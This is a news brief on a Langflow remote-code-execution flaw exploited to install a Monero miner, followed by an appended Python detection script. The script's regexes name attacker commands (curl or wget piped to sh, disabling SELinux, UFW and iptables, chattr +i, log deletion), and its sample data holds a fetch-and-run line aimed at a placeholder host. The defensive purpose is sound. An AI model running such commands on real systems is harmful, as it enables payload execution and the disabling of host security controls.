
Critical Langflow vulnerability exploited to deploy Monero cryptocurrency miner


Threat actors are actively exploiting a critical vulnerability in Langflow, identified as CVE-2026-33017, to deploy a Monero cryptocurrency miner, according to Trend Micro. This vulnerability, with a CVSS score of 9.3, allows for unauthenticated remote code execution, enabling attackers to gain initial access to enterprise networks by targeting exposed artificial intelligence application endpoints. The exploitation campaign was observed between March 27 and April 15, 2026, with further coverage provided by The Hacker News.

The attack chain begins with a single line of Python code executed via an unauthenticated Langflow API endpoint. This code downloads a shell script that fetches and launches a cryptocurrency miner binary as a detached process. The malware is designed to terminate competing miners from groups like Kinsing and WatchDog, remove rival wallet data, disable security controls, and establish persistence through cron jobs. It also spreads to other systems via reused SSH keys.

The miner binary, written in Go, disables security measures such as AppArmor, UFW, iptables, SELinux, and cloud security agents. It also removes system logs and manipulates file attributes to maintain its presence. The campaign highlights how exposed AI application endpoints are becoming a new entry point for threat actors.
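A triage sketch for the behaviour chain described above, added here as an illustration and not taken from Trend Micro, The Hacker News or SC Media: it flags hosts where several of the named behaviours appear close together in process-execution logs. The command patterns, event format, host names, window and threshold are assumptions, not published indicators for this campaign.

```python
import re
from collections import defaultdict

# Behaviour categories come from the article; the regexes are assumed
# command shapes, not indicators published for this campaign.
BEHAVIOURS = {
    "fetch_and_run": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "disable_controls": re.compile(
        r"\bsetenforce\s+0\b|\bufw\s+disable\b|\biptables\s+(-F|--flush)\b"
        r"|\bsystemctl\s+(stop|disable)\s+apparmor\b"),
    "cron_persistence": re.compile(r"\bcrontab\s+-(?!l)|/etc/cron|/var/spool/cron"),
    "file_attributes": re.compile(r"\bchattr\s+[+-]\w*i"),
    "log_removal": re.compile(r"\b(rm|truncate)\b.*\s/var/log/"),
}

def triage(events, window=600, threshold=3):
    """Return {host: sorted behaviours} for hosts where at least `threshold`
    distinct behaviours occur within `window` seconds of a first hit."""
    hits = defaultdict(list)
    for ts, host, cmdline in events:
        for name, rx in BEHAVIOURS.items():
            if rx.search(cmdline):
                hits[host].append((ts, name))
    flagged = {}
    for host, seen in hits.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            names = {n for t, n in seen[i:] if t - start <= window}
            if len(names) >= threshold:
                flagged[host] = sorted(names)
                break
    return flagged

# Constructed sample events: (epoch seconds, host, command line).
SAMPLE = [
    (1000, "ai-app-01", "sh -c curl -fsSL http://example.invalid/x.sh | sh"),
    (1012, "ai-app-01", "setenforce 0"),
    (1015, "ai-app-01", "ufw disable"),
    (1040, "ai-app-01", "chattr +i /tmp/placeholder"),
    (1060, "ai-app-01", "crontab -"),
    (2000, "build-07", "iptables -F"),   # lone admin action, below threshold
    (9000, "build-07", "crontab -l"),    # listing only, not a cron write
]

if __name__ == "__main__":
    for host, names in triage(SAMPLE).items():
        print(host, names)
```

Requiring several distinct behaviours in one window keeps a single routine admin command, such as a firewall flush on a build host, from raising an alert by itself.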

Source: The Hacker News
